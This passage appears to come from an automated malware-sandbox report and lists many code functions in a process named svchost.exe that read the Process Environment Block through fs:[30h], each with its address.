            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h] 1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h] 1_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h] 1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h] 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h] 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h] 1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03060124 mov eax, dword ptr fs:[00000030h] 1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h] 1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h] 1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h] 1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h] 1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03070185 mov eax, dword ptr fs:[00000030h] 1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h] 1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h] 1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h] 1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h] 1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h]1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h]1_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h]1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h]1_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h]1_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h]1_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h]1_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h]1_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h]1_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h]1_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h]1_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h]1_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h]1_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030710 mov eax, dword ptr fs:[00000030h]1_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060710 mov eax, dword ptr fs:[00000030h]1_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h]1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306273C mov eax, dword ptr fs:[00000030h]1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h]1_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov esi, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306674D mov eax, dword ptr fs:[00000030h]1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03030750 mov eax, dword ptr fs:[00000030h]1_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h]1_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072750 mov eax, dword ptr fs:[00000030h]1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D678E mov eax, dword ptr fs:[00000030h]1_2_030D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030307AF mov eax, dword ptr fs:[00000030h]1_2_030307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E47A0 mov eax, dword ptr fs:[00000030h]1_2_030E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303C7C0 mov eax, dword ptr fs:[00000030h]1_2_0303C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B07C3 mov eax, dword ptr fs:[00000030h]1_2_030B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030527ED mov eax, dword ptr fs:[00000030h]1_2_030527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BE7E1 mov eax, dword ptr fs:[00000030h]1_2_030BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030347FB mov eax, dword ptr fs:[00000030h]1_2_030347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE609 mov eax, dword ptr fs:[00000030h]1_2_030AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304260B mov eax, dword ptr fs:[00000030h]1_2_0304260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03072619 mov eax, dword ptr fs:[00000030h]1_2_03072619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E627 mov eax, dword ptr fs:[00000030h]1_2_0304E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03066620 mov eax, dword ptr fs:[00000030h]1_2_03066620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068620 mov eax, dword ptr fs:[00000030h]1_2_03068620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303262C mov eax, dword ptr fs:[00000030h]1_2_0303262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304C640 mov eax, dword ptr fs:[00000030h]1_2_0304C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F866E mov eax, dword ptr fs:[00000030h]1_2_030F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A660 mov eax, dword ptr fs:[00000030h]1_2_0306A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03062674 mov eax, dword ptr fs:[00000030h]1_2_03062674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034690 mov eax, dword ptr fs:[00000030h]1_2_03034690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C6A6 mov eax, dword ptr fs:[00000030h]1_2_0306C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030666B0 mov eax, dword ptr fs:[00000030h]1_2_030666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A6C7 mov eax, dword ptr fs:[00000030h]1_2_0306A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AE6F2 mov eax, dword ptr fs:[00000030h]1_2_030AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B06F1 mov eax, dword ptr fs:[00000030h]1_2_030B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C6500 mov eax, dword ptr fs:[00000030h]1_2_030C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104500 mov eax, dword ptr fs:[00000030h]1_2_03104500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040535 mov eax, dword ptr fs:[00000030h]1_2_03040535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E53E mov eax, dword ptr fs:[00000030h]1_2_0305E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038550 mov eax, dword ptr fs:[00000030h]1_2_03038550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306656A mov eax, dword ptr fs:[00000030h]1_2_0306656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov eax, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032582 mov ecx, dword ptr fs:[00000030h]1_2_03032582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03064588 mov eax, dword ptr fs:[00000030h]1_2_03064588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E59C mov eax, dword ptr fs:[00000030h]1_2_0306E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B05A7 mov eax, dword ptr fs:[00000030h]1_2_030B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030545B1 mov eax, dword ptr fs:[00000030h]1_2_030545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E5CF mov eax, dword ptr fs:[00000030h]1_2_0306E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030365D0 mov eax, dword ptr fs:[00000030h]1_2_030365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306A5D0 mov eax, dword ptr fs:[00000030h]1_2_0306A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305E5E7 mov eax, dword ptr fs:[00000030h]1_2_0305E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030325E0 mov eax, dword ptr fs:[00000030h]1_2_030325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306C5ED mov eax, dword ptr fs:[00000030h]1_2_0306C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03068402 mov eax, dword ptr fs:[00000030h]1_2_03068402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E420 mov eax, dword ptr fs:[00000030h]1_2_0302E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C427 mov eax, dword ptr fs:[00000030h]1_2_0302C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B6420 mov eax, dword ptr fs:[00000030h]1_2_030B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E443 mov eax, dword ptr fs:[00000030h]1_2_0306E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA456 mov eax, dword ptr fs:[00000030h]1_2_030EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302645D mov eax, dword ptr fs:[00000030h]1_2_0302645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305245A mov eax, dword ptr fs:[00000030h]1_2_0305245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BC460 mov ecx, dword ptr fs:[00000030h]1_2_030BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305A470 mov eax, dword ptr fs:[00000030h]1_2_0305A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EA49A mov eax, dword ptr fs:[00000030h]1_2_030EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030364AB mov eax, dword ptr fs:[00000030h]1_2_030364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030644B0 mov ecx, dword ptr fs:[00000030h]1_2_030644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030BA4B0 mov eax, dword ptr fs:[00000030h]1_2_030BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030304E5 mov ecx, dword ptr fs:[00000030h]1_2_030304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03104B00 mov eax, dword ptr fs:[00000030h]1_2_03104B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AEB1D mov eax, dword ptr fs:[00000030h]1_2_030AEB1D
